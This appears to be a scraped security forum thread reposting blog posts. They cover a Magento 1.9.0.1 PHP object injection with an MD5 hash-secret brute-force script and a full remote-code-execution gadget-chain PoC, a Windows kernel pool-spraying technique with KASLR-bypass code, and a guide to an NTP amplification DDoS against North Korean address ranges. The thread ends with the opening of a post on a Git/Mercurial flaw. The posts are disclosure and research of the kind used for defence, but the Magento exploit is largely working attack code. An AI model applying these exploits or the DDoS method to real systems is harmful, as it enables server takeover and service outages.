-6 ::1 noquery Posted by Chris Evans at 4:28 AM Sursa: Project Zero: Finding and exploiting ntpd vulnerabilities
  21. Magento 1.9.0.1 PHP Object Injection Recently, I found a PHP Object Injection (POI) vulnerability in the administrator interface of Magento 1.9.0.1. Magento is an e-commerce software written in PHP that was acquired by Ebay Inc. A bug bounty program is run that attracts with a 10,000$ bounty for remote code execution bugs. A POI vulnerability can lead to such a remote code execution, depending on the gadget chains the attacker is able to trigger. Sadly I stopped investigating the POI vulnerability and resumed 1 week later – a fatal error. When I continued investigating exploitable gadget chains, Magento pushed an update in the meantime that patches several security issues. The POI is not mentioned anywhere, but it is fixed by replacing the affected unserialize() call with json_decode(). So no bug bounty, but the exploitation is still worth a look at because it includes a hash verification bypass and a cool gadget that allowed full code coverage in gadget chaining. In the end, an attacker can execute arbitrary code on the targeted server. However, administrator privileges are required. 1. PHP Object Injection In Magento 1.9.0.1, the method tunnelAction() of the administrator’s DashboardController is affected by a POI vulnerability. It deserializes user data supplied in the ga parameter. [TABLE] [TR] [TD=class: gutter]86 87 88 89 90 91 92 93 94[/TD] [TD=class: code]// app/code/core/Mage/Adminhtml/controllers/DashboardController.php public function tunnelAction() { $gaData = $this->getRequest()->getParam('ga'); $gaHash = $this->getRequest()->getParam('h'); if ($gaData && $gaHash) { $newHash = Mage::helper('adminhtml/dashboard_data')->getChartDataHash($gaData); if ($newHash == $gaHash) { if ($params = unserialize(base64_decode(urldecode($gaData)))) { [/TD] [/TR] [/TABLE] A closer look reveals, however, that the base64 encoded, serialized data is protected with a hash from manipulation. The hash of the gaData is generated with the method getChartDataHash() and is then compared to the hash supplied in the h parameter. Only if both hashes match, the data is deserialized. Lets get some sample data. The tunnelAction() is triggered, when the dashboard graph is loaded. [TABLE] [TR] [TD=class: gutter]61 62[/TD] [TD=class: code]// app/design/adminhtml/default/default/template/dashboard/graph.phtml <img src="<?php echo $this->getChartUrl(false) ?> [/TD] [/TR] [/TABLE] Here, the method getChartUrl() serializes graph parameters and creates the gaHash of the base64 encoded gaData. [TABLE] [TR] [TD=class: gutter]446 447 448 449 450 451 452 453[/TD] [TD=class: code]// app/code/core/Mage/Adminhtml/Block/Dashboard/Graph.php function getChartUrl() { ... $gaData = urlencode(base64_encode(serialize($params))); $gaHash = Mage::helper('adminhtml/dashboard_data')->getChartDataHash($gaData); $params = array('ga' => $gaData, 'h' => $gaHash); return $this->getUrl('*/*/tunnel', array('_query' => $params)); }[/TD] [/TR] [/TABLE] The following request is generated and can be intercepted: [TABLE] [TR] [TD=class: gutter]1 2 3[/TD] [TD=class: code]/index.php/admin/dashboard/tunnel/key/803e506c399449c72975fc1fcc2c0435/ ?ga=eyJjaHQiOiJsYyIsImNoZiI6ImJnLHMsZjRmNGY0fGMsbGcsOTAsZmZmZmZmLDAuMSxlZGVkZWQsMCIsImNobSI6IkIsZjRkNGIyLDAsMCwwIiwiY2hjbyI6ImRiNDgxNCIsImNoZCI6ImU6IiwiY2h4dCI6IngseSIsImNoeGwiOiIwOnx8fDk6MDAgdm9ybS58fHwxMjowMCBuYWNobS58fHwzOjAwIG5hY2htLnx8fDY6MDAgbmFjaG0ufHx8OTowMCBuYWNobS58fHwxMjowMCB2b3JtLnx8fDM6MDAgdm9ybS58fHw2OjAwIHZvcm0ufDE6fDB8MSIsImNocyI6IjU4N3gzMDAiLCJjaGciOiI0LjM0NzgyNjA4Njk1NjUsMTAwLDEsMCJ9 &h=61f3757d04b665baac6f8176a2012337[/TD] [/TR] [/TABLE] We can base64 decode the data in the ga parameter (line 2) and modify the serialized parameters in order to exploit the PHP Object Injection vulnerability. However, we then have to generate a valid hash for our malformed data and replace it with the hash in the h parameter (line 3). Otherwise, our manipulated data is not deserialized. 2. Hash Verification Lets have a look at how the hash is generated and if we can forge it for manipulated data. The hash is created in the getChartDataHash() method by calculating the MD5 hash of the base64 encoded data concatenated with a secret. If we know this secret, we can generate our own hash for our modified gaData. [TABLE] [TR] [TD=class: gutter]86 87 88 89 90 91[/TD] [TD=class: code]// app/code/core/Mage/Adminhtml/Helper/Dashboard/Data.php public function getChartDataHash($data) { $secret = (string)Mage::getConfig()->getNode(Mage_Core_Model_App::XML_PATH_INSTALL_DATE); return md5($data . $secret); } [/TD] [/TR] [/TABLE] Luckily, the secret is cryptographically very weak. As the constant’s name suggests, the config value XML_PATH_INSTALL_DATE refers to the date of the Magento installation in RFC 2822 format. For example, the secret date could look like the following: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]Sat, 1 Nov 2014 21:08:46 +0000[/TD] [/TR] [/TABLE] Assuming that the installation was performed maximum 1 year ago, there are less than 31 * 12 * 24*60*60 = 32 Mio possibilities. We can take the intercepted sample data to bruteforce the secret date locally. Furthermore, we can narrow down the possible date window by observing the HTTP response header of the targeted web server. For example, the HTTP response for a request of the favicon file tells us its last modification date: [TABLE] [TR] [TD=class: gutter]1 2[/TD] [TD=class: code]Request: GET /favicon.ico HTTP/1.0[/TD] [/TR] [/TABLE] [TABLE] [TR] [TD=class: gutter]1 2[/TD] [TD=class: code]Response If-Modified-Since: Wed, 05 Nov 2014 09:06:45 GMT [/TD] [/TR] [/TABLE] This should equal to the exact date when the installation files were copied to the server. We can then assume, that the installation was performed at least within the same month when this file was extracted. Also, it tells us the timezone (here GMT) used by the server. This leaves us only with 30 * 24*60*60 = 2.6 Mio possibilities which can be bruteforced within a few seconds. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15[/TD] [TD=class: code]$gaData = 'eyJjaHQiOiJsYyIsImNoZiI6ImJnLHMsZjRmNGY0fGMsbGcsOTAsZmZmZmZmLDAuMSxlZGVkZWQsMCIsImNobSI6IkIsZjRkNGIyLDAsMCwwIiwiY2hjbyI6ImRiNDgxNCIsImNoZCI6ImU6IiwiY2h4dCI6IngseSIsImNoeGwiOiIwOnx8fDk6MDAgdm9ybS58fHwxMjowMCBuYWNobS58fHwzOjAwIG5hY2htLnx8fDY6MDAgbmFjaG0ufHx8OTowMCBuYWNobS58fHwxMjowMCB2b3JtLnx8fDM6MDAgdm9ybS58fHw2OjAwIHZvcm0ufDE6fDB8MSIsImNocyI6IjU4N3gzMDAiLCJjaGciOiI0LjM0NzgyNjA4Njk1NjUsMTAwLDEsMCJ9'; $hash = '61f3757d04b665baac6f8176a2012337'; date_default_timezone_set('GMT'); // Wed, 05 Nov 2014 09:06:45 GMT $timestamp = mktime(9, 6, 45, 11, 5, 2014); $today = time(); for($i=0;$i<2592000 && $timestamp<$today; $i++) { $secret = date(DATE_RFC2822, $timestamp++); if(md5($gaData . $secret) === $hash) { echo $secret; break; } }[/TD] [/TR] [/TABLE] Once we obtained the secret, we can alter the serialized data and create a valid hash for it, so our data is deserialized by the server. That means we can inject arbitrary objects into the application and trigger gadget chains by invoking the object’s magic methods (for more details please refer to our paper). 3. Gadget Chain Magento’s code base is huge and many interesting initial gadgets (magic methods) can be found that trigger further gadgets (methods). For example, the usual File Deletion and File Permission Modification calls can be triggered in order to delete files. This is partly interesting in Magento, because the deletion of the /app/.htaccess file allows to access the /app/etc/local.xml file which contains the crypto key. However, since we own already administrative privileges, we are interested in more severe vulnerabilities. It turns out, that the included (and autoloaded) Varien library provides all gadgets we need to execute arbitrary code on the server. The deprecated class Varien_File_Uploader_Image provides a destructor as our initial gadget that allows us to jump to arbitrary clean() methods. [TABLE] [TR] [TD=class: gutter]356 357 358 359 360[/TD] [TD=class: code]// lib/Varien/File/Uploader/Image.php:357 function __destruct() { $this->uploader->Clean(); }[/TD] [/TR] [/TABLE] This way, we can jump to the clean() method of the class Varien_Cache_Backend_Database. It fetches a database adapter from the property _adapter and executes a TRUNCATE TABLE query with its query() method. The table name can be controlled by the attacker by setting the property _options[‘data_table’]. [TABLE] [TR] [TD=class: gutter]249 250 251 252 253 254 255 256 257 258 259 260 261[/TD] [TD=class: code]// lib/Varien/Cache/Backend/Database.php public function clean($mode = Zend_Cache::CLEANING_MODE_ALL, $tags = array()) { $adapter = $this->_adapter; switch($mode) { case Zend_Cache::CLEANING_MODE_ALL: if ($this->_options['store_data']) { $result = $adapter->query('TRUNCATE TABLE '.$this->_options['data_table']); } ... } }[/TD] [/TR] [/TABLE] If we provide the Varien_Db_Adapter_Pdo_Mysql as database adapter, its query() method passes along the query to the very interesting method _prepareQuery(), before the query is executed. [TABLE] [TR] [TD=class: gutter]421 422 423 424 425 426 427 428 429 430 431 432[/TD] [TD=class: code]// lib/Varien/Db/Adapter/Pdo/Mysql.php public function query($sql, $bind = array()) { try { $this->_checkDdlTransaction($sql); $this->_prepareQuery($sql, $bind); $result = parent::query($sql, $bind); } catch (Exception $e) { ... } } [/TD] [/TR] [/TABLE] The _prepareQuery() method uses the _queryHook property for reflection. Not only the method name is reflected, but also the receiving object. This allows us to call any method of any class in the Magento code base with control of the first argument – a really cool gadget found by the new RIPS prototype. [TABLE] [TR] [TD=class: gutter]463 464 465 466 467 468 469 470 471 472 473 474[/TD] [TD=class: code]// lib/Varien/Db/Adapter/Pdo/Mysql.php protected function _prepareQuery(&$sql, &$bind = array()) { ... // Special query hook if ($this->_queryHook) { $object = $this->_queryHook['object']; $method = $this->_queryHook['method']; $object->$method($sql, $bind); } } [/TD] [/TR] [/TABLE] From here it wasn’t hard to find a critical method that operates on its properties or its first parameter. For example, we can jump to the filter() method of the Varien_Filter_Template_Simple class. Here, the regular expression of a preg_replace() call is built dynamically with the properties _startTag and _endTag that we control. More importantly, the dangerous eval modifier is already appended to the regular expression, which leads to the execution of the second preg_replace() argument as PHP code. [TABLE] [TR] [TD=class: gutter]39 40 41 42 43 44 45[/TD] [TD=class: code]// lib/Varien/Filter/Template/Simple.php public function filter($value) { return preg_replace('#'.$this->_startTag.'(.*?)'.$this->_endTag.'#e', '$this->getData("$1")', $value); } [/TD] [/TR] [/TABLE] In the executed PHP code of the second preg_replace() argument, the match of the first group is used ($1). Important to note are the double quotes that allow us to execute arbitrary PHP code by using curly brace syntax. 4. Exploit Now we can put everything together. We inject a Varien_File_Uploader_Image object that will invoke the class’ destructor. In the uploader property we create a Varien_Cache_Backend_Database object, in order to invoke its clean() method. We point the object’s _adapter property to a Varien_Db_Adapter_Pdo_Mysql object, so that its query() method also triggers the valuable _prepareQuery() method. In the _options[‘data_table’] property, we can specify our PHP code payload, for example: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]{${system(id)}}RIPS[/TD] [/TR] [/TABLE] We also append the string RIPS as delimiter. Then we point the _queryHook property of the Varien_Db_Adapter_Pdo_Mysql object to a Varien_Filter_Template_Simple object and its filter method. This method will be called via reflection and receives the following argument: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]TRUNCATE TABLE {${system(id)}}RIPS[/TD] [/TR] [/TABLE] When we not set the Varien_Filter_Template_Simple object’s property _startTag to TRUNCATE TABLE and the property _endTag to RIPS the first match group of the regular expression in the preg_replace() call will be our PHP code. Thus, the following PHP code will be executed: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]$this->getData("{${system(id)}}")[/TD] [/TR] [/TABLE] In order to determine the variables name, the system() call will be evaluated within the curly syntax. This leads us to execution of arbitrary PHP code or system commands. PoC: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43[/TD] [TD=class: code]class Zend_Db_Profiler { protected $_enabled = false; } class Varien_Filter_Template_Simple { protected $_startTag; protected $_endTag; public function __construct() { $this->_startTag = 'TRUNCATE TABLE '; $this->_endTag = 'RIPS'; } } class Varien_Db_Adapter_Pdo_Mysql { protected $_transactionLevel = 0; protected $_queryHook; protected $_profiler; public function __construct() { $this->_queryHook = array(); $this->_queryHook['object'] = new Varien_Filter_Template_Simple; $this->_queryHook['method'] = 'filter'; $this->_profiler = new Zend_Db_Profiler; } } class Varien_Cache_Backend_Database { protected $_options; protected $_adapter; public function __construct() { $this->_adapter = new Varien_Db_Adapter_Pdo_Mysql; $this->_options['data_table'] = '{${system(id)}}RIPS'; $this->_options['store_data'] = true; } } class Varien_File_Uploader_Image { public $uploader; public function __construct() { $this->uploader = new Varien_Cache_Backend_Database; } } $obj = new Varien_File_Uploader_Image; $b64 = base64_encode(serialize($obj)); $secret = 'Sat, 1 Nov 2014 21:08:46 +0000'; $hash = md5($b64 . $secret); echo '?ga='.$b64.'&h='.$hash;[/TD] [/TR] [/TABLE] The POI was straight-forward but we had to circumvent a hash verification first and find nice gadgets. A reflection injection allowed us to trigger almost arbitrary gadget chains through the entire code base that in the end allowed remote code execution. In the next post we have a look at another POI I played with lately, but triggering the POI itself will be more tricky. Sursa: https://websec.wordpress.com/2014/12/08/magento-1-9-0-1-poi/
  22. [h=2]Sheep Year Kernel Heap Fengshui: Spraying in the Big Kids’ Pool[/h] [h=2]The State of Kernel Exploitation[/h] The typical write-what-where kernel-mode exploit technique usually relies on either modifying some key kernel-mode data structure, which is easy to do locally on Windows thanks to poor Kernel Address Space Layout Randomization (KASLR), or on redirecting execution to a controlled user-mode address, which will now run with Ring 0 rights. Relying on a user-mode address is an easy way not to worry about the kernel address space, and to have full control of the code within a process. Editing the tagWND structure or the HAL Dispatch Table are two very common vectors, as are many others. However, with Supervisor Mode Execution Prevention (SMEP), also called Intel OS Guard, this technique is no longer reliable — a direct user-mode address cannot be used, and other techniques must be employed instead. One possibility is to disable SMEP Enforcement in the CR4 register through Return-Oriented Programming, or ROP, if stack control is possible. This has been covered in a few papers and presentations. Another related possibility is to disable SMEP Enforcement on a per-page basis — taking a user-mode page and marking it as a kernel page by making the required changes in the page level translation mapping entries. This has also been talked in at least one presentation, and, if accepted, a future SyScan 2015 talk from a friend of mine will also cover this technique. Additionally, if accepted, an alternate version of the technique will be presented at INFILTRATE 2015, by yours truly. Finally, a theoretical possibility is being able to transfer execution (through a pointer, callback table, etc) to an existing function that disables SMEP (and thus bypassing KASLR), but then somehow continues to give the attacker control without ROP — nobody has yet found such a function. This would be a type of Jump-Oriented Programming (JOP) attack. Nonetheless, all of these techniques continue to leverage a user-mode address as the main payload (nothing wrong with that). However, one must also consider the possibility to use a kernel-mode address for the attack, which means that no ROP and/or PTE hacking is needed to disable SMEP in the first place. Obviously, this means that the function to perform the malicious payload’s work already exists in the kernel, or we have a way of bringing it into the kernel. In the case of a stack/pool overflow, this payload probably already comes with the attack, and the usual tricks have been employed there in order to get code execution. Such attacks are particularly common in true ‘remote-remote’ attacks. But what of write-what-where bugs, usually the domain of the local (or remote-local) attacker? If we have user-mode code execution available to us, to execute the write-what-where, we can obviously continue using the write-what-where exploit to repeatedly fill an address of our choice with the payload data. This presents a few problems however: The write-what-where may be unreliable, or corrupt adjacent data. This makes it hard to use it to ‘fill’ memory with code. It may not be obvious where to write the code — having to deal with KASLR as well as Kernel NX. On Windows, this is not terribly hard, but it should be recognized as a barrier nonetheless. This blog post introduces what I believe to be two new techniques, namely a generic kernel-mode heap spraying technique which results in executable memory, followed by a generic kernel-mode heap address discovery technique, bypassing KASLR. [h=2]Big Pool[/h] Experts of the Windows heap manager (called the pool) know that there are two different allocators (three, if you’re being pedantic): the regular pool allocator (which can use lookaside lists that work slightly differently than regular pool allocations), and the big/large page pool allocator. The regular pool is used for any allocations that fit within a page, so either 4080 bytes on x86 (8 bytes for the pool header, and 8 bytes used for the initial free block), or 4064 bytes on x64 (16 bytes for the pool header, 16 bytes used for the initial free block). The tracking, mapping, and accounting of such allocations is handled as part of the regular slush of kernel-mode memory that the pool manager owns, and the pool headers link everything together. Big pool allocations, on the other hand, take up one or more pages. They’re used for anything over the sizes above, as well as when the CacheAligned type of pool memory is used, regardless of the requested allocation size — there’s no way to easily guarantee cache alignment without dedicating a whole page to an allocation. Because there’s no room for a header, these pages are tracked in a separate “Big Pool Tracking Table” (nt!PoolBigPageTable), and the pool tags, which are used to identify the owner of an allocation, are also not present in the header (since there isn’t one!), but rather in the table as well. Each entry in this table is represented by a POOL_TRACKER_BIG_PAGES structure, documented in the public symbols: [TABLE] [TR] [TD=class: line_numbers]1 2 3 4 5 [/TD] [TD=class: code]lkd> dt nt!_POOL_TRACKER_BIG_PAGES +0x000 Va : Ptr32 Void +0x004 Key : Uint4B +0x008 PoolType : Uint4B +0x00c NumberOfBytes : Uint4B[/TD] [/TR] [/TABLE] One thing to be aware of is that the Virtual Address (Va) is OR’ed with a bit to indicate if the allocation is freed or allocated — in other words, you may have duplicate Va’s, some freed, and at most one allocated. The following simple WinDBG script will dump all the big pool allocations for you: [TABLE] [TR] [TD=class: line_numbers]1 2 3 4 5 6 7 8 9 10 [/TD] [TD=class: code]r? @$t0 = (nt!_POOL_TRACKER_BIG_PAGES*)@@(poi(nt!PoolBigPageTable)) r? @$t1 = *(int*)@@(nt!PoolBigPageTableSize) / sizeof(nt!_POOL_TRACKER_BIG_PAGES) .for (r @$t2 = 0; @$t2 < @$t1; r? @$t2 = @$t2 + 1) { r? @$t3 = @$t0[@$t2]; .if (@@(@$t3.Va != 1)) { .printf "VA: 0x%p Size: 0x%lx Tag: %c%c%c%c Freed: %d Paged: %d CacheAligned: %d\n", @@((int)@$t3.Va & ~1), @@(@$t3.NumberOfBytes), @@(@$t3.Key >> 0 & 0xFF), @@(@$t3.Key >> 8 & 0xFF), @@(@$t3.Key >> 16 & 0xFF), @@(@$t3.Key >> 24 & 0xFF), @@((int)@$t3.Va & 1), @@(@$t3.PoolType & 1), @@(@$t3.PoolType & 4) == 4 } }[/TD] [/TR] [/TABLE] Why are big pool allocations interesting? Unlike small pool allocations, which can share pages, and are hard to track for debugging purposes (without dumping the entire pool slush), big pool allocations are easy to enumerate. So easy, in fact, that the undocumented KASLR-be-damned API NtQuerySystemInformation has an information class specifically designed for dumping big pool allocations. Including not only their size, their tag, and their type (paged or nonpaged), but also their kernel virtual address! As previously presented, this API requires no privileges, and only in Windows 8.1 has it been locked down against low integrity callers (Metro/Sandboxed applications). With the little snippet of code below, you can easily enumerate all big pool allocations: [TABLE] [TR] [TD=class: line_numbers]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 [/TD] [TD=class: code]// // Note: This is poor programming (hardcoding 4MB). // The correct way would be to issue the system call // twice, and use the resultLength of the first call // to dynamically size the buffer to the correct size // bigPoolInfo = RtlAllocateHeap(RtlGetProcessHeap(), 0, 4 * 1024 * 1024); if (bigPoolInfo == NULL) goto Cleanup; res = NtQuerySystemInformation(SystemBigPoolInformation, bigPoolInfo, 4 * 1024 * 1024, &resultLength); if (!NT_SUCCESS(res)) goto Cleanup; printf("TYPE ADDRESS\tBYTES\tTAG\n"); for (i = 0; i < bigPoolInfo->Count; i++) { printf("%s0x%p\t0x%lx\t%c%c%c%c\n", bigPoolInfo->AllocatedInfo[i].NonPaged == 1 ? "Nonpaged " : "Paged ", bigPoolInfo->AllocatedInfo[i].VirtualAddress, bigPoolInfo->AllocatedInfo[i].SizeInBytes, bigPoolInfo->AllocatedInfo[i].Tag[0], bigPoolInfo->AllocatedInfo[i].Tag[1], bigPoolInfo->AllocatedInfo[i].Tag[2], bigPoolInfo->AllocatedInfo[i].Tag[3]); } Cleanup: if (bigPoolInfo != NULL) { RtlFreeHeap(RtlGetProcessHeap(), 0, bigPoolInfo); }[/TD] [/TR] [/TABLE] [h=2]Pool Control[/h] Obviously, it’s quite useful to have all these handy kernel-mode addresses. But what can we do to control their data, and not only be able to read their address? You may be aware of previous techniques where a user-mode attacker allocates a kernel-object (say, an APC Reserve Object), which has a few fields that are user-controlled, and which then has an API to get its kernel-mode address. We’re essentially going to do the same here, but rely on more than just a few fields. Our goal, therefore, is to find a user-mode API that can give us full control over the kernel-mode data of a kernel object, and additionally, to result in a big pool allocation. This isn’t as hard as it sounds: anytime a kernel-mode component allocates over the limits above, a big pool allocation is done instead. Therefore, the exercise reduces itself to finding a user-mode API that can result in a kernel allocation of over 4KB, whose data is controlled. And since Windows XP SP2 and later enforce kernel-mode non-executable memory, the allocation should be executable as well. Two easy examples may popup in your head: Creating a local socket, listening to it, connecting from another thread, accepting the connection, and then issuing a write of > 4KB of socket data, but not reading it. This will result in the Ancillary Function Driver for WinSock (AFD.SYS), also affectionally known as “Another F*cking Driver”, allocating the socket data in kernel-mode memory. Because the Windows network stack functions at DISPATCH_LEVEL (IRQL 2), and paging is not available, AFD will use a nonpaged pool buffer for the allocation. This is great, because until Windows 8, nonpaged pool is executable! Creating a named pipe, and issuing a write of > 4KB of data, but not reading it. This will result in the Named Pipe File System (NPFS.SYS) allocating the pipe data in a nonpaged pool buffer as well (because NPFS performs buffer management at DISPATCH_LEVEL as well). Ultimately, #2 is a lot easier, requiring only a few lines of code, and being much less inconspicuous than using sockets. The important thing you have to know is that NPFS will prefix our buffer with its own internal header, which is called a DATA_ENTRY. Each version of NPFS has a slightly different size (XP- vs 2003+ vs Windows 8+). I’ve found that the cleanest way to handle this, and not to worry about offsets in the final kernel payload, is to internally handle this in the user-mode buffer with the right offsets. And finally, remember that the key here is to have a buffer that’s at least the size of a page, so we can force the big pool allocator. Here’s a little snippet that keeps all this into account and will have the desired effects: [TABLE] [TR] [TD=class: line_numbers]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 [/TD] [TD=class: code]UCHAR payLoad[PAGE_SIZE - 0x1C + 44]; // // Fill the first page with 0x41414141, and the next page // with INT3's (simulating our payload). On x86 Windows 7 // the size of a DATA_ENTRY is 28 bytes (0x1C). // RtlFillMemory(payLoad, PAGE_SIZE - 0x1C, 0x41); RtlFillMemory(payLoad + PAGE_SIZE - 0x1C, 44, 0xCC); // // Write the data into the kernel // res = CreatePipe(&readPipe, &writePipe, NULL, sizeof(payLoad)); if (res == FALSE) goto Cleanup; res = WriteFile(writePipe, payLoad, sizeof(payLoad), &resultLength, NULL); if (res == FALSE) goto Cleanup; // // extra code goes here... // Cleanup: CloseHandle(writePipe); CloseHandle(readPipe);[/TD] [/TR] [/TABLE] Now all we need to know is that NPFS uses the pool tag ‘NpFr’ for the read data buffers (you can find this out by using the !pool and !poolfind commands in WinDBG). We can then change the earlier KASLR-defeating snippet to hard-code the pool tag and expected allocation size, and we can instantly find the kernel-mode address of our buffer, which will fully match our user-mode buffer. Keep in mind that the “Paged vs. Nonpaged” flag is OR’ed into the virtual address (this is different from the structure in the kernel, which tracks free vs. allocated), so we’ll mask that out, and also make sure you align the size to the pool header alignment (it’s enforced even for big pool allocations). Here’s that snippet, for x86 Windows: [TABLE] [TR] [TD=class: line_numbers]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 [/TD] [TD=class: code]// // Based on pooltag.txt, we're looking for the following: // NpFr - npfs.sys - DATA_ENTRY records (r/w buffers) // for (entry = bigPoolInfo->AllocatedInfo; entry < (PSYSTEM_BIGPOOL_ENTRY)bigPoolInfo + bigPoolInfo->Count; entry++) { if ((entry->NonPaged == 1) && (entry->TagUlong == 'rFpN') && (entry->SizeInBytes == ALIGN_UP(PAGE_SIZE + 44, ULONGLONG))) { printf("Kernel payload @ 0x%p\n", (ULONG_PTR)entry->VirtualAddress & ~1 + PAGE_SIZE); break; } }[/TD] [/TR] [/TABLE] And here’s the proof in WinDBG: Voila! Package this into a simple “kmalloc” helper function, and now you too, can allocate executable, kernel-mode memory, at a known address! How big can these allocations get? I’ve gone up to 128MB without a problem, but this being non-paged pool, make sure you have the RAM to handle it. Here’s a link to some sample code which implements exactly this functionality. An additional benefit of this technique is that not only can you get the virtual address of your allocation, you can even get the physical address! Indeed, as part of the undocumented Superfetch API that I first discovered and implemented in my meminfo tool, which has now been supplanted by the RAMMap utility from SysInternals, the memory manager will happily return the pool tag, virtual address, and physical address of our allocation. Here’s a screenshot of RAMMap showing another payload allocation and its corresponding physical address (note that the 0x1000 difference is since the command-line PoC biases the pointer, as you saw in the code). [h=2]Next Steps[/h] Now, for full disclosure, there are a few additional caveats that make this technique a bit less sexy in 2015 — and why I chose to talk about it today, and not 8 years ago when I first stumbled upon it: 1) Starting with Windows 8, nonpaged pool allocations are now non-executable. This means that while this trick still lets you spray the pool, your code will require some sort of NX bypass first. So you’ve gone from bypassing SMEP to bypassing kernel-mode NX. 2) In Windows 8.1, the API to get the big pool entries and their addresses is no longer usable by low-integrity callers. This significantly reduces the usefulness in local-remote attacks, since those are usually launched through sandboxed applications (Flash, IE, Chrome, etc) and/or Metro containers. Of course, there are some ways around this — a sandbox escape is often used in local-remote attacks anyway, so #2 can become moot. As for #1, some astute researchers have already figured out that NX was not fully deployed — for example, Session Pool allocations, are STILL executable on newer versions of Windows, but only on x86 (32-bit). I leave it as an exercise to readers to figure out how this technique can be extended to leverage that (hint: there’s a ‘Big Session Pool’). But what about a modern, 64-bit version of Windows, say even Windows 10? Well, this technique appears to be mostly dead on such systems — or does it? Is everything truly NX in the kernel, or are there still some sneaky ways to get some executable memory, and to get its address? I’ll be sure to blog about it once Windows 14 is out the door in 2022. © Alex Ionescu Sheep Year Kernel Heap Fengshui: Spraying in the Big Kids’ Pool « Alex Ionescu’s Blog
  23. [h=3]Anybody can take North Korea offline[/h] By Robert Graham A couple days after the FBI blamed the Sony hack on North Korea, that country went offline. Many suspected the U.S. government, but the reality is that anybody can do it -- even you. I mention this because of a Vox.com story that claims "There is no way that Anonymous pulled off this scale of an attack on North Korea". That's laughably wrong, overestimating the scale of North Korea's Internet connection, and underestimating the scale of Anonymous's capabilities. North Korea has a roughly ~10-gbps link to the Internet for it's IP addresses. That's only about ten times what Google fiber provides. In other words, 10 American households can have as much bandwidth as the entire country. Anonymous's capabilities exceed this, scaling past 1-terabit/second, or a hundred times more than needed to take down North Korea. Attacks are made easier due to amplifiers on the Internet, which can increase the level of traffic by about 100 times. Thus, in order to overload a 10-gbps link of your target, you only need a 100-mbps link yourself. This is well within the capabilities of a single person. Such attacks are difficult to do from your home, because your network connection is asymmetric. A 100-mbps from Comcast refers to the download speed -- it's only about 20-mbps in the other direction. You'll probably need to use web host services that sell high upload speed. You can cheaply get a 100-mbps or even 1-gbps upload connection for about $30 per month in bitcoin. You'll need to find one that doesn't do egress filtering, because you'll be spoofing North Korea's addresses, but that's rarely a problem. You need some familiarity with command-line tools. In this age of iPads, the command-line seems like Dark Magic to some people, but it's something all computer geeks use regularly. Thus, to do these attacks, you'll need some basic geek skills, but they are something that can be acquired in a week. How I would do it is roughly shown by the following command-line command. This uses some software I wrote for port-scanning, but as a side effect, it can also be used for these sorts of "amplified DDoS" attacks. What we see in this command-line is the following: use spoofing as part of the attack targeting the North Korean IP addresses around 175.45.176.0 bouncing the packets off a list of amplifiers building a custom NTP monlist packet that causes amplification sending to port 123 (NTP) sending at a rate of one million packets/second repeating the attack infinitely (never stopping) For this attack to work, you'll need a list of amplifiers. You can find these lists in hacker forums, or you can just find the amplifiers yourself using masscan (after all, that's what port scanners are supposed to do). I use masscan in my example because it's my tool, so it's how I'd do it, but no special tool is needed. You can write you own code to do it pretty easily, and there are tons of other tools that can be configured to do this. I stress this because people have this belief in the power of cyberweapons, that powerful effects like disabling a country can't happen without powerful weapons. This belief is nonsense. It's unknown if Anonymous hackers actually DDoSed North Korea, like the "Lizard Square" that claims responsibility, but it's easily within their capabilities. What's actually astonishing is that since millions of people can so easily DDoS North Korea why it doesn't happen more often. Note: This only takes down one aspect of the North Korean Internet. Satellite links, other telephony links, cell phones, and the ".kp" domain names would still be unaffected. It would take some skill to attack all those possibilities, but it appears that the hackers only did the simple DDoS. Sursa: Errata Security: Anybody can take North Korea offline
  24. Umflatu'
  25. [h=1]12 Days of HaXmas: Exploiting CVE-2014-9390 in Git and Mercurial[/h]Posted by jhart in Metasploit on Jan 1, 2015 2:18:22 PM This post is the eighth in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements and events in the Metasploit Framework over the course of 2014. A week or two back, Mercurial inventor Matt Mackall found what ended up being filed as CVE-2014-9390. While the folks behind CVE are still publishing the final details, Git clients (before versions 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial clients (before version 3.2.3) contained three vulnerabilities that allowed malicious Git or Mercurial repositories to execute arbitrary code on vulnerable clients under certain circumstances. To understand these vulnerabilities and their impact, you must first understand a few basic things about Git and Mercurial clients. Under the hood, a Git or Mercurial repository on disk is really just a directory. In this directory is another specially named directory (.git for Git, .hg for Mercurial) that contains all of the configuration files and metadata that makes up the repository. Everything else outside of this special directory is just a pile of files and directories, often called the working directory, written to disk based on the previous mentioned metadata. So, in a way, if you had a Git repository called Test, Test/.hg is the repository and everything else under the Test directory is simply a working copy of of the files contained in the repository at a particular point in time. An nearly identical concept also exists in Mercurial. Here is a quick example of a simple Git repository that contains has no files committed to it. As you can see, even this empty repository has a fair amount of metadata and a number of configuration files: $ git init foo $ tree -a foo foo ??? .git ??? branches ??? config ??? description ??? HEAD ??? hooks ? ??? applypatch-msg.sample ? ??? commit-msg.sample ? ??? post-update.sample ? ??? pre-applypatch.sample ? ??? pre-commit.sample ? ??? prepare-commit-msg.sample ? ??? pre-rebase.sample ? ??? update.sample ??? info ? ??? exclude ??? objects ? ??? info ? ??? pack ??? refs ??? heads ??? tags If you then add a single file to it called test.txt, you can see how the directory starts to change as the raw objects are added to the .git/objects directory: $ cd foo $ date > test.txt && git add test.txt && git commit -m "Add test.txt" -a [master (root-commit) fb19d8e] Add test.txt 1 file changed, 1 insertion(+) create mode 100644 test.txt $ git log commit fb19d8e1e5db83b4b11bbd7ed91e1120980a38e0 Author: Jon Hart Date: Wed Dec 31 09:08:41 2014 -0800 Add test.txt $ tree -a . . ??? .git ? ??? branches ? ??? 